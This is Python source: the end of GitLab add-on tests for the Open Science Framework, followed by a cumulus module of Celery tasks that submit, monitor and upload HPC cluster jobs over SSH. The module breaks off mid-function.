def test_hook_callback_remove_file_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'Deleted via the Open Science Framework',
'timestamp': '2014-01-08T14:15:51-08:00',
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': [], 'removed':['PRJWN3TV'], 'modified':[]}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_not_equal(self.project.logs.latest().action, 'gitlab_file_removed')
class TestRegistrationsWithGitLab(OsfTestCase):
def setUp(self):
super(TestRegistrationsWithGitLab, self).setUp()
self.project = ProjectFactory.build()
self.project.save()
self.consolidated_auth = Auth(user=self.project.creator)
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.node_settings = self.project.get_addon('gitlab')
self.user_settings = self.project.creator.get_addon('gitlab')
self.node_settings.user_settings = self.user_settings
self.node_settings.user = 'Queen'
self.node_settings.repo = 'Sheer-Heart-Attack'
self.node_settings.save()
class TestGitLabSettings(OsfTestCase):
def setUp(self):
super(TestGitLabSettings, self).setUp()
self.gitlab = create_mock_gitlab(user='fred', private=False)
self.project = ProjectFactory()
self.auth = self.project.creator.auth
self.consolidated_auth = Auth(user=self.project.creator)
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.node_settings = self.project.get_addon('gitlab')
self.user_settings = self.project.creator.get_addon('gitlab')
self.node_settings.user_settings = self.user_settings
self.node_settings.user = 'Queen'
self.node_settings.repo = 'Sheer-Heart-Attack'
self.node_settings.repo_id = 'sheer-heart-attack'
self.node_settings.save()
@mock.patch('addons.gitlab.models.NodeSettings.add_hook')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_link_repo(self, mock_repo, mock_add_hook):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo.return_value
url = self.project.api_url + 'gitlab/settings/'
self.app.post_json(
url,
{
'gitlab_user': 'queen',
'gitlab_repo': 'night at the opera',
'gitlab_repo_id': 'abc',
},
auth=self.auth
).maybe_follow()
self.project.reload()
self.node_settings.reload()
assert_equal(self.node_settings.user, 'queen')
assert_equal(self.node_settings.repo, 'night at the opera')
assert_equal(self.project.logs.latest().action, 'gitlab_repo_linked')
mock_add_hook.assert_called_once_with(save=False)
@mock.patch('addons.gitlab.models.NodeSettings.add_hook')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_link_repo_no_change(self, mock_repo, mock_add_hook):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo.return_value
log_count = self.project.logs.count()
url = self.project.api_url + 'gitlab/settings/'
self.app.post_json(
url,
{
'gitlab_user': self.node_settings.user,
'gitlab_repo': self.node_settings.repo,
'gitlab_repo_id': self.node_settings.repo_id,
},
auth=self.auth
).maybe_follow()
self.project.reload()
self.node_settings.reload()
assert_equal(self.project.logs.count(), log_count)
assert_false(mock_add_hook.called)
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_link_repo_non_existent(self, mock_repo):
mock_repo.return_value = None
url = self.project.api_url + 'gitlab/settings/'
res = self.app.post_json(
url,
{
'gitlab_user': 'queen',
'gitlab_repo': 'night at the opera',
},
auth=self.auth,
expect_errors=True
).maybe_follow()
assert_equal(res.status_code, 400)
@mock.patch('addons.gitlab.api.GitLabClient.branches')
def test_link_repo_registration(self, mock_branches):
mock_branches.return_value = [
Branch.from_json(dumps({
'name': 'master',
'commit': {
'sha': '6dcb09b5b57875f334f61aebed695e2e4193db5e',
'url': 'https://api.gitlab.com/repos/octocat/Hello-World/commits/c5b97d5ae6c19d5c5df71a34c7fbeeda2479ccbc',
}
})),
Branch.from_json(dumps({
'name': 'develop',
'commit': {
'sha': '6dcb09b5b57875asdasedawedawedwedaewdwdass',
'url': 'https://api.gitlab.com/repos/octocat/Hello-World/commits/cdcb09b5b57875asdasedawedawedwedaewdwdass',
}
}))
]
registration = self.project.register_node(
schema=get_default_metaschema(),
auth=self.consolidated_auth,
data=''
)
url = registration.api_url + 'gitlab/settings/'
res = self.app.post_json(
url,
{
'gitlab_user': 'queen',
'gitlab_repo': 'night at the opera',
},
auth=self.auth,
expect_errors=True
).maybe_follow()
assert_equal(res.status_code, 400)
@mock.patch('addons.gitlab.models.NodeSettings.delete_hook')
def test_deauthorize(self, mock_delete_hook):
url = self.project.api_url + 'gitlab/user_auth/'
self.app.delete(url, auth=self.auth).maybe_follow()
self.project.reload()
self.node_settings.reload()
assert_equal(self.node_settings.user, None)
assert_equal(self.node_settings.repo, None)
assert_equal(self.node_settings.user_settings, None)
assert_equal(self.project.logs.latest().action, 'gitlab_node_deauthorized')
if __name__ == '__main__':
unittest.main()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2015 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
from __future__ import absolute_import
import traceback
from cumulus.common import check_status
from cumulus.common import get_post_logger, get_job_logger
from cumulus.common import get_cluster_logger
from cumulus.celery import command, monitor
import cumulus
import cumulus.girderclient
import cumulus.constants
from cumulus.constants import ClusterType, JobQueueState
from cumulus.queue import get_queue_adapter
from cumulus.queue.abstract import AbstractQueueAdapter
from cumulus.transport import get_connection
from cumulus.transport.files.download import download_path
from cumulus.transport.files.upload import upload_path
from cumulus.transport.files import get_assetstore_url_base, get_assetstore_id
import requests
import os
import re
import inspect
import time
import uuid
from six import StringIO
from celery import signature
from celery.exceptions import Retry
from jinja2 import Environment, Template, PackageLoader
from jsonpath_rw import parse
import tempfile
from girder_client import HttpError
import paramiko
def _put_script(conn, script_commands):
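    """Upload a throw-away shell script to the cluster and mark it executable.
    ``script_commands`` is expected to end with a backgrounded command; the
    appended ``echo $!`` prints that command's PID so callers can monitor it.
    Returns the relative command used to invoke the script.
    """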
script_name = uuid.uuid4().hex
script = script_commands + 'echo $!\n'
conn.put(StringIO(script), script_name)
cmd = './%s' % script_name
conn.execute('chmod 700 %s' % cmd)
return cmd
def job_directory(cluster, job, user_home='.'):
"""
    Return the directory a job runs in. The output root is taken from the
    job parameters if present, then from the cluster configuration, and
    finally falls back to the user's home directory.
    :param cluster: The cluster the job is running on.
    :param job: The job to return the directory for.
"""
# First try the job parameters
output_root = parse('params.jobOutputDir').find(job)
if output_root:
output_root = output_root[0].value
else:
# Try the cluster
output_root = parse('config.jobOutputDir').find(cluster)
if output_root:
output_root = output_root[0].value
else:
output_root = user_home
return os.path.join(output_root, job['_id'])
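# Hedged usage sketch (added example, not part of the original module): the
# resolution above prefers the job's own parameters over the cluster
# configuration, with the user's home directory as a last resort. The dicts
# below are illustrative only.
def _job_directory_example():
    job = {'_id': 'abc123', 'params': {'jobOutputDir': '/scratch/jobs'}}
    cluster = {'config': {'jobOutputDir': '/data/jobs'}}
    # the job's parameters win over the cluster configuration
    assert job_directory(cluster, job) == '/scratch/jobs/abc123'
    # with no overrides the user's home directory ('.') is used
    assert job_directory({'config': {}}, {'_id': 'abc123'}) == './abc123'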
def download_job_input_items(cluster, job, log_write_url=None,
girder_token=None):
headers = {'Girder-Token': girder_token}
job_id = job['_id']
status_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl, job_id)
try:
with get_connection(girder_token, cluster) as conn:
# First put girder client on master
path = inspect.getsourcefile(cumulus.girderclient)
with open(path, 'r') as fp:
conn.put(fp, os.path.basename(path))
r = requests.patch(status_url, json={'status': 'downloading'},
headers=headers)
check_status(r)
download_cmd = 'python girderclient.py --token %s --url "%s" ' \
'download --dir %s --job %s' \
% (girder_token, cumulus.config.girder.baseUrl,
job_directory(cluster, job), job_id)
download_output = '%s.download.out' % job_id
download_cmd = 'nohup %s &> %s &\n' % (download_cmd,
download_output)
download_cmd = _put_script(conn, download_cmd)
output = conn.execute(download_cmd)
# Remove download script
conn.remove(download_cmd)
if len(output) != 1:
raise Exception('PID not returned by execute command')
try:
pid = int(output[0])
except ValueError:
raise Exception('Unable to extract PID from: %s' % output)
# When the download is complete submit the job
on_complete = submit_job.s(cluster, job, log_write_url=log_write_url,
girder_token=girder_token)
monitor_process.delay(cluster, job, pid, download_output,
log_write_url=log_write_url,
on_complete=on_complete,
girder_token=girder_token)
except Exception as ex:
r = requests.patch(status_url, headers=headers,
json={'status': 'error'})
check_status(r)
get_job_logger(job, girder_token).exception(str(ex))
def download_job_input_folders(cluster, job, log_write_url=None,
girder_token=None, submit=True):
job_dir = job_directory(cluster, job)
with get_connection(girder_token, cluster) as conn:
for input in job['input']:
if 'folderId' in input and 'path' in input:
folder_id = input['folderId']
path = input['path']
upload_path(conn, girder_token, folder_id,
os.path.join(job_dir, path))
if submit:
submit_job.delay(cluster, job, log_write_url=log_write_url,
girder_token=girder_token)
@command.task
def download_job_input(cluster, job, log_write_url=None, girder_token=None):
job_url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl, job['_id'])
log = get_post_logger(job['_id'], girder_token, job_url)
# Create job directory
with get_connection(girder_token, cluster) as conn:
conn.makedirs(job_directory(cluster, job))
log.info('Downloading input for "%s"' % job['name'])
if parse('input.itemId').find(job):
download_job_input_items(cluster, job, log_write_url=log_write_url,
girder_token=girder_token)
else:
download_job_input_folders(cluster, job, log_write_url=log_write_url,
girder_token=girder_token)
def _get_parallel_env(cluster, job):
parallel_env = None
if 'parallelEnvironment' in job.get('params', {}):
parallel_env = job['params']['parallelEnvironment']
elif 'parallelEnvironment' in cluster['config']:
parallel_env = cluster['config']['parallelEnvironment']
    # if this is an EC2 cluster then we can default to orte
if not parallel_env and cluster['type'] == ClusterType.EC2:
parallel_env = 'orte'
return parallel_env
def _is_terminating(job, girder_token):
headers = {'Girder-Token': girder_token}
status_url = '%s/jobs/%s/status' % (cumulus.config.girder.baseUrl,
job['_id'])
r = requests.get(status_url, headers=headers)
check_status(r)
current_status = r.json()['status']
return current_status in [JobState.TERMINATED, JobState.TERMINATING]
def _generate_submission_script(job, cluster, job_params):
env = Environment(loader=PackageLoader('cumulus', 'templates'))
template = env.get_template('template.sh')
script = template.render(cluster=cluster, job=job,
baseUrl=cumulus.config.girder.baseUrl,
**job_params)
    # Render a second time so that any template variables embedded in the
    # job's own commands are filled out as well.
script = Template(script).render(cluster=cluster, job=job,
baseUrl=cumulus.config.girder.baseUrl,
**job_params)
return script
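# Illustrative sketch (an assumption, not taken from the original source):
# the double render above lets a placeholder nested inside a job command,
# e.g. 'mpirun -n {{ numberOfSlots }} ./app', survive the first pass and be
# expanded on the second.
def _double_render_example():
    first = Template('{{ job.commands[0] }}').render(
        job={'commands': ['mpirun -n {{ numberOfSlots }} ./app']})
    # the first pass leaves the nested placeholder intact
    assert first == 'mpirun -n {{ numberOfSlots }} ./app'
    # the second pass fills it in from the job parameters
    assert Template(first).render(numberOfSlots=8) == 'mpirun -n 8 ./app'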
def _get_on_complete(job):
on_complete = parse('onComplete.cluster').find(job)
if on_complete:
on_complete = on_complete[0].value
else:
on_complete = None
return on_complete
@command.task
def submit_job(cluster, job, log_write_url=None, girder_token=None,
monitor=True):
job_url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl, job['_id'])
log = get_post_logger(job['_id'], girder_token, job_url)
headers = {'Girder-Token': girder_token}
job_id = job['_id']
status_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl, job_id)
try:
# if terminating break out
if _is_terminating(job, girder_token):
return
script_name = job['name']
with get_connection(girder_token, cluster) as conn:
job_params = {}
if 'params' in job:
job_params = job['params']
output = conn.execute('pwd')
if len(output) != 1:
                raise Exception("Unable to fetch the user's home directory.")
user_home = output[0].strip()
job_dir = job_directory(cluster, job, user_home=user_home)
job['dir'] = job_dir
slots = -1
# Try job parameters first
slots = int(job_params.get('numberOfSlots', slots))
if slots == -1:
# Try the cluster
slots = int(cluster['config'].get('numberOfSlots', slots))
parallel_env = _get_parallel_env(cluster, job)
if parallel_env:
job_params['parallelEnvironment'] = parallel_env
# If the number of slots has not been provided we will get
# the number of slots from the parallel environment
if slots == -1:
slots = int(get_queue_adapter(cluster, conn)
.number_of_slots(parallel_env))
if slots > 0:
job_params['numberOfSlots'] = slots
script = _generate_submission_script(job, cluster, job_params)
conn.makedirs(job_dir)
# put the script to master
conn.put(StringIO(script), os.path.join(job_dir, script_name))
if slots > -1:
log.info('We have %s slots available' % slots)
# Now submit the job
queue_job_id \
= get_queue_adapter(cluster, conn).submit_job(job,
script_name)
# Update the state and queue job id
job[AbstractQueueAdapter.QUEUE_JOB_ID] = queue_job_id
patch_data = {
'status': JobState.QUEUED,
AbstractQueueAdapter.QUEUE_JOB_ID: queue_job_id,
'dir': job_dir
}
r = requests.patch(status_url, headers=headers, json=patch_data)
check_status(r)
job = r.json()
job['queuedTime'] = time.time()
# Now monitor the jobs progress
if monitor:
monitor_job.s(
cluster, job, log_write_url=log_write_url,
girder_token=girder_token).apply_async(countdown=5)
# Now update the status of the job
headers = {'Girder-Token': girder_token}
r = requests.patch(status_url, headers=headers,
json={'status': JobState.QUEUED})
check_status(r)
except Exception as ex:
traceback.print_exc()
r = requests.patch(status_url, headers=headers,
json={'status': JobState.UNEXPECTEDERROR})
check_status(r)
get_job_logger(job, girder_token).exception(str(ex))
raise
def submit(girder_token, cluster, job, log_url):
    # Do we have inputs to download?
if 'input' in job and len(job['input']) > 0:
download_job_input.delay(cluster, job, log_write_url=log_url,
girder_token=girder_token)
else:
submit_job.delay(cluster, job, log_write_url=log_url,
girder_token=girder_token)
class JobState(object):
CREATED = cumulus.constants.JobState.CREATED
RUNNING = cumulus.constants.JobState.RUNNING
TERMINATED = cumulus.constants.JobState.TERMINATED
TERMINATING = cumulus.constants.JobState.TERMINATING
UNEXPECTEDERROR = cumulus.constants.JobState.UNEXPECTEDERROR
QUEUED = cumulus.constants.JobState.QUEUED
ERROR = cumulus.constants.JobState.ERROR
UPLOADING = cumulus.constants.JobState.UPLOADING
ERROR_UPLOADING = cumulus.constants.JobState.ERROR_UPLOADING
COMPLETE = cumulus.constants.JobState.COMPLETE
def __init__(self, previous, **kwargs):
if previous:
for key in previous._keys:
setattr(self, key, getattr(previous, key))
self._keys = previous._keys
else:
self._keys = kwargs.keys()
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return self.__class__.__name__.lower()
def __lt__(self, other):
return str(self) < str(other)
def __cmp__(self, other):
a = str(self)
b = str(other)
return (a > b) - (a < b)
def __hash__(self):
return hash(str(self))
def _update_queue_time(self, job):
if 'queuedTime' in job:
queued_time = time.time() - job['queuedTime']
job['timings'] = {'queued': int(round(queued_time * 1000))}
del job['queuedTime']
job['runningTime'] = time.time()
def next(self, job_queue_status):
raise NotImplementedError('Should be implemented by subclass')
def run(self):
raise NotImplementedError('Should be implemented by subclass')
class Created(JobState):
def next(self, job_queue_status):
if not job_queue_status or job_queue_status == JobQueueState.COMPLETE:
return Uploading(self)
elif job_queue_status == JobQueueState.RUNNING:
return Running(self)
elif job_queue_status == JobQueueState.QUEUED:
return Queued(self)
elif job_queue_status == JobQueueState.ERROR:
return Error(self)
else:
raise Exception('Unrecognized state: %s' % job_queue_status)
def run(self):
return self
class Queued(JobState):
def next(self, job_queue_status):
if not job_queue_status or job_queue_status == JobQueueState.COMPLETE:
return Uploading(self)
elif job_queue_status == JobQueueState.RUNNING:
return Running(self)
elif job_queue_status == JobQueueState.QUEUED:
return self
elif job_queue_status == JobQueueState.ERROR:
return Error(self)
else:
raise Exception('Unrecognized state: %s' % job_queue_status)
def run(self):
return self
class Running(JobState):
def _tail_output(self):
job_url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl,
self.job['_id'])
log = get_post_logger(self.job['_id'], self.girder_token, job_url)
# Do we need to tail any output files
for output in self.job.get('output', []):
if 'tail' in output and output['tail']:
path = output['path']
offset = 0
if 'content' in output:
offset = len(output['content'])
else:
output['content'] = []
tail_path = os.path.join(self.job['dir'], path)
command = 'tail -n +%d %s' % (offset, tail_path)
try:
# Only tail if file exists
if self.conn.isfile(tail_path):
stdout = self.conn.execute(command)
output['content'] = output['content'] + stdout
else:
log.info('Skipping tail of %s as file doesn\'t '
'currently exist' %
tail_path)
except Exception as ex:
get_job_logger(self.job,
self.girder_token).exception(str(ex))
def next(self, job_queue_status):
if not job_queue_status or job_queue_status == JobQueueState.COMPLETE:
return Uploading(self)
elif job_queue_status == JobQueueState.RUNNING:
return self
elif job_queue_status == JobQueueState.ERROR:
return Error(self)
else:
raise Exception('Unrecognized state: %s' % job_queue_status)
def run(self):
self._update_queue_time(self.job)
self._tail_output()
return self
class Complete(JobState):
def next(self, job_queue_status):
error = False
for output in self.job.get('output', []):
if 'errorRegEx' in output and output['errorRegEx']:
stdout_file = '%s-%s.o%s' % (self.job['name'],
self.job['_id'],
self.job['queueJobId'])
                stderr_file = '%s-%s.e%s' % (self.job['name'],
                                             self.job['_id'],
                                             self.job['queueJobId'])
variables = {
'stdout': stdout_file,
'stderr': stderr_file
}
tmp_path = None
try:
path = Template(output['path']).render(**variables)
tmp_path = os.path.join(tempfile.tempdir, path)
path = os.path.join(self.job['dir'], path)
self.conn.get(path, localpath=tmp_path)
error_regex = re.compile(output['errorRegEx'])
with open(tmp_path, 'r') as fp:
for line in fp:
if error_regex.match(line):
error = True
break
finally:
if tmp_path and os.path.exists(tmp_path):
os.remove(tmp_path)
if error:
break
if error:
return Error(self)
return self
def run(self):
if _get_on_complete(self.job) == 'terminate':
cluster_log_url = '%s/clusters/%s/log' % \
(cumulus.config.girder.baseUrl, self.cluster['_id'])
command.send_task(
'cumulus.tasks.cluster.terminate_cluster',
args=(self.cluster,),
kwargs={'log_write_url': cluster_log_url,
'girder_token': self.girder_token})
class Terminating(JobState):
def next(self, job_queue_status):
if not job_queue_status or job_queue_status == JobQueueState.COMPLETE:
return Terminated(self)
else:
return self
def run(self):
return self
class Terminated(JobState):
def next(self, task, job, job_queue_status):
return self
def run(self):
return self
class Uploading(JobState):
def next(self, job_queue_status):
job_url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl,
self.job['_id'])
log = get_post_logger(self.job['_id'], self.girder_token, job_url)
job_name = self.job['name']
if 'runningTime' in self.job:
running_time = time.time() - self.job['runningTime']
self.job.get('timings', {})['running'] \
= int(round(running_time * 1000))
del self.job['runningTime']
# Fire off task to upload the output
log.info('Job "%s" complete' % job_name)
upload = self.job.get('uploadOutput', True)
if not upload or len(self.job.get('output', [])) == 0:
return Complete(self)
return self
def run(self):
upload = self.job.get('uploadOutput', True)
if upload and len(self.job.get('output', [])) > 0:
upload_job_output.delay(self.cluster, self.job,
log_write_url=self.log_write_url,
job_dir=self.job['dir'],
girder_token=self.girder_token)
class Error(Complete):
def next(self, job_queue_status):
return self
class ErrorUploading(Uploading):
def next(self, job_queue_status):
return Error(self)
def run(self):
return self
class UnexpectedError(JobState):
def next(self, job_queue_status):
return self
def run(self):
return self
state_classes = {
JobState.CREATED: Created,
JobState.QUEUED: Queued,
JobState.RUNNING: Running,
JobState.COMPLETE: Complete,
JobState.TERMINATING: Terminating,
JobState.TERMINATED: Terminated,
JobState.UPLOADING: Uploading,
JobState.ERROR: Error,
JobState.ERROR_UPLOADING: ErrorUploading,
JobState.UNEXPECTEDERROR: UnexpectedError
}
def from_string(s, **kwargs):
state = state_classes[s](None, **kwargs)
return state
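# Minimal sketch (hypothetical values, not part of the original module) of
# driving the state machine above: a QUEUED job reported as running by the
# queue adapter transitions to Running, while a job that has left the queue
# moves towards Uploading.
def _state_machine_example():
    queued = from_string(JobState.QUEUED, task=None, cluster={}, job={},
                         log_write_url=None, girder_token=None, conn=None)
    assert isinstance(queued.next(JobQueueState.RUNNING), Running)
    assert isinstance(queued.next(None), Uploading)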
def _monitor_jobs(task, cluster, jobs, log_write_url=None, girder_token=None,
monitor_interval=5):
headers = {'Girder-Token': girder_token}
cluster_url = '%s/clusters/%s' % (
cumulus.config.girder.baseUrl, cluster['_id'])
try:
with get_connection(girder_token, cluster) as conn:
try:
job_queue_states \
= get_queue_adapter(cluster, conn).job_statuses(jobs)
new_states = set()
for (job, state) in job_queue_states:
job_id = job['_id']
# First get the current status
status_url = '%s/jobs/%s/status' % (
cumulus.config.girder.baseUrl, job_id)
r = requests.get(status_url, headers=headers)
check_status(r)
current_status = r.json()['status']
if current_status == JobState.TERMINATED:
continue
job_status = from_string(current_status, task=task,
cluster=cluster, job=job,
log_write_url=log_write_url,
girder_token=girder_token,
conn=conn)
job_status = job_status.next(state)
job['status'] = str(job_status)
job_status.run()
json = {
'status': str(job_status),
'timings': job.get('timings', {}),
'output': job['output']
}
job_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl,
job['_id'])
r = requests.patch(job_url, headers=headers, json=json)
check_status(r)
new_states.add(job['status'])
# Now see if we still have jobs to monitor
running_states = set(
[JobState.CREATED, JobState.QUEUED,
JobState.RUNNING, JobState.TERMINATING]
)
# Do we have any job still in a running state?
if new_states & running_states:
task.retry(countdown=monitor_interval)
except EOFError:
# Try again
task.retry(countdown=5)
return
except paramiko.ssh_exception.NoValidConnectionsError:
# Try again
task.retry(countdown=5)
return
# Ensure that the Retry exception will get through
except Retry:
raise
except paramiko.ssh_exception.NoValidConnectionsError as ex:
r = requests.patch(cluster_url, headers=headers,
json={'status': 'error'})
check_status(r)
get_cluster_logger(cluster, girder_token).exception(str(ex))
except Exception as ex:
traceback.print_exc()
r = requests.patch(cluster_url, headers=headers,
json={'status': 'error'})
check_status(r)
get_cluster_logger(cluster, girder_token).exception(str(ex))
raise
@monitor.task(bind=True, max_retries=None, throws=(Retry,))
def monitor_job(task, cluster, job, log_write_url=None, girder_token=None,
monitor_interval=5):
_monitor_jobs(task, cluster, [job], log_write_url, girder_token,
monitor_interval=monitor_interval)
@monitor.task(bind=True, max_retries=None, throws=(Retry,))
def monitor_jobs(task, cluster, jobs, log_write_url=None, girder_token=None,
monitor_interval=5):
_monitor_jobs(task, cluster, jobs, log_write_url, girder_token,
monitor_interval=monitor_interval)
def upload_job_output_to_item(cluster, job, log_write_url=None, job_dir=None,
girder_token=None):
headers = {'Girder-Token': girder_token}
job_id = job['_id']
status_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl, job_id)
try:
# if terminating break out
if _is_terminating(job, girder_token):
return
with get_connection(girder_token, cluster) as conn:
# First put girder client on master
path = inspect.getsourcefile(cumulus.girderclient)
with open(path, 'r') as fp:
conn.put(fp,
os.path.normpath(os.path.join(job_dir, '..',
os.path.basename(path))))
cmds = ['cd %s' % job_dir]
upload_cmd = 'python ../girderclient.py --token %s --url "%s" ' \
'upload --job %s' \
% (girder_token,
cumulus.config.girder.baseUrl, job['_id'])
upload_output = '%s.upload.out' % job_id
upload_output_path = os.path.normpath(os.path.join(job_dir, '..',
upload_output))
cmds.append('nohup %s &> ../%s &\n' % (upload_cmd, upload_output))
upload_cmd = _put_script(conn, '\n'.join(cmds))
output = conn.execute(upload_cmd)
# Remove upload script
conn.remove(upload_cmd)
if len(output) != 1:
raise Exception('PID not returned by execute command')
try:
pid = int(output[0])
except ValueError:
raise Exception('Unable to extract PID from: %s' % output)
on_complete = None
if _get_on_complete(job) == 'terminate':
cluster_log_url = '%s/clusters/%s/log' % \
(cumulus.config.girder.baseUrl, cluster['_id'])
on_complete = signature(
'cumulus.tasks.cluster.terminate_cluster',
args=(cluster,), kwargs={'log_write_url': cluster_log_url,
'girder_token': girder_token})
monitor_process.delay(cluster, job, pid, upload_output_path,
log_write_url=log_write_url,
on_complete=on_complete,
girder_token=girder_token)
except Exception as ex:
r = requests.patch(status_url, headers=headers,
json={'status': JobState.UNEXPECTEDERROR})
check_status(r)
get_job_logger(job, girder_token).exception(str(ex))
def upload_job_output_to_folder(cluster, job, log_write_url=None, job_dir=None,
girder_token=None):
status_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl, job['_id'])
headers = {'Girder-Token': girder_token}
assetstore_base_url = get_assetstore_url_base(cluster)
assetstore_id = get_assetstore_id(girder_token, cluster)
if not job_dir:
job_dir = job['dir']
try:
with get_connection(girder_token, cluster) as conn:
for output in job['output']:
if 'folderId' in output and 'path' in output:
folder_id = output['folderId']
path = os.path.join(job_dir, output['path'])
download_path(conn, girder_token, folder_id, path,
assetstore_base_url, assetstore_id,
include=output.get('include'),
exclude=output.get('exclude'))
except HttpError as e:
job['status'] = JobState.ERROR
url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl, job['_id'])
logger = get_post_logger('job', girder_token, url)
logger.exception(e.responseText)
r = requests.patch(status_url, headers=headers,
json={'status': JobState.ERROR})
check_status(r)
if _get_on_complete(job) == 'terminate':
cluster_log_url = '%s/clusters/%s/log' % \
(cumulus.config.girder.baseUrl, cluster['_id'])
command.send_task(
'cumulus.tasks.cluster.terminate_cluster',
args=(cluster,), kwargs={'log_write_url': cluster_log_url,
'girder_token': girder_token})
    # If we were uploading, move the job to the complete state
if job['status'] == JobState.UPLOADING:
job_status = from_string(job['status'], task=None,
cluster=cluster, job=job,
log_write_url=log_write_url,
girder_token=girder_token,
conn=conn)
job_status = Complete(job_status)
job_status = job_status.next(JobQueueState.COMPLETE)
job_status.run()
r = requests.patch(status_url, headers=headers,
json={'status': str(job_status)})
check_status(r)
@command.task
def upload_job_output(cluster, job, log_write_url=None, job_dir=None,
girder_token=None):
job_name = job['name']
job_url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl, job['_id'])
log = get_post_logger(job['_id'], girder_token, job_url)
log.info('Uploading output for "%s"' % job_name)
if parse('output.itemId').find(job):
upload_job_output_to_item(cluster, job, log_write_url=log_write_url,
job_dir=job_dir, girder_token=girder_token)
else:
upload_job_output_to_folder(cluster, job, log_write_url=log_write_url,
job_dir=job_dir, girder_token=girder_token)
@monitor.task(bind=True, max_retries=None)
def monitor_process(task, cluster, job, pid, nohup_out_path,
log_write_url=None, on_complete=None,
output_message='Job download/upload error: %s',
girder_token=None):
job_url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl, job['_id'])
log = get_post_logger(job['_id'], girder_token, job_url)
headers = {'Girder-Token': girder_token}
job_id = job['_id']
status_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl, job_id)
try:
# if terminating break out
if _is_terminating(job, girder_token):
return
with get_connection(girder_token, cluster) as conn:
# See if the process is still running
output = conn.execute('ps %s | grep %s' % (pid, pid),
ignore_exit_status=True,
source_profile=False)
if len(output) > 0:
# Process is still running so schedule self again in about 5
# secs
# N.B. throw=False to prevent Retry exception being raised
task.retry(throw=False, countdown=5)
else:
try:
nohup_out_file_name = os.path.basename(nohup_out_path)
# Log the output
with conn.get(nohup_out_path) as fp:
output = fp.read()
if output.strip():
log.error(output_message % output)
# If we have output then set the error state on the
# job and return
r = requests.patch(status_url, headers=headers,
json={'status': JobState.ERROR})
check_status(r)
return
finally:
if nohup_out_file_name and \
os.path.exists(nohup_out_file_name):
os.remove(nohup_out_file_name)
                # Fire off the on_complete task if we have one
if on_complete:
signature(on_complete).delay()
                # If we were uploading, move the job to the complete state
if job['status'] == JobState.UPLOADING:
job_status = from_string(job['status'], task=task,
cluster=cluster, job=job,
log_write_url=log_write_url,
girder_token=girder_token,
conn=conn)
job_status = Complete(job_status)
job_status = job_status.next(JobQueueState.COMPLETE)
job_status.run()
r = requests.patch(status_url, headers=headers,
json={'status': str(job_status)})
check_status(r)
except EOFError:
# Try again
task.retry(throw=False, countdown=5)
except Exception as ex:
r = requests.patch(status_url, headers=headers,
json={'status': JobState.UNEXPECTEDERROR})
check_status(r)
get_job_logger(job, girder_token).exception(str(ex))
raise
@command.task
def terminate_job(cluster, job, log_write_url=None, girder_token=None):
script_filepath = None
headers = {'Girder-Token': girder_token}
job_id = job['_id']
status_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl, job_id)
try:
with get_connection(girder_token, cluster) as conn:
if AbstractQueueAdapter.QUEUE_JOB_ID in job:
queue_adapter = get_queue_adapter(cluster, conn)
output = queue_adapter.terminate_job(job)
else:
r = requests.patch(status_url, headers=headers,
json={'status': JobState.TERMINATED})
check_status(r)
if 'onTerminate' in job:
commands = '\n'.join(job['onTerminate']['commands']) + '\n'
commands = Template(commands) \
.render(cluster=cluster,
job=job,
base_url=cumulus.config.girder.baseUrl)
on_terminate = _put_script(conn, commands + '\n')
terminate_output = '%s.terminate.out' % job_id
terminate_cmd = 'nohup %s &> %s &\n' % (on_terminate,
terminate_output)
terminate_cmd = _put_script(conn, terminate_cmd)
output = conn.execute(terminate_cmd)
conn.remove(on_terminate)
conn.remove(terminate_cmd)
if len(output) != 1:
raise Exception('PID not returned by execute command')
try:
pid = int(output[0])
except ValueError:
raise Exception('Unable to extract PID from: %s'
% output)
output_message = 'onTerminate error: %s'
monitor_process.delay(cluster, job, pid, terminate_output,
log_write_url=log_write_url,
output_message=output_message,
girder_token=girder_token)
except Exception as ex:
r = requests.patch(status_url, headers=headers,
json={'status': JobState.UNEXPECTEDERROR})
check_status(r)
get_job_logger(job, girder_token).exception(str(ex))
raise
finally:
if script_filepath and os.path.exists(script_filepath):
os.remove(script_filepath)
@command.task(bind=True, max_retries=5)
def remove_output(task, cluster, job, girder_token):
try:
with get_connection(girder_token, cluster) as conn:
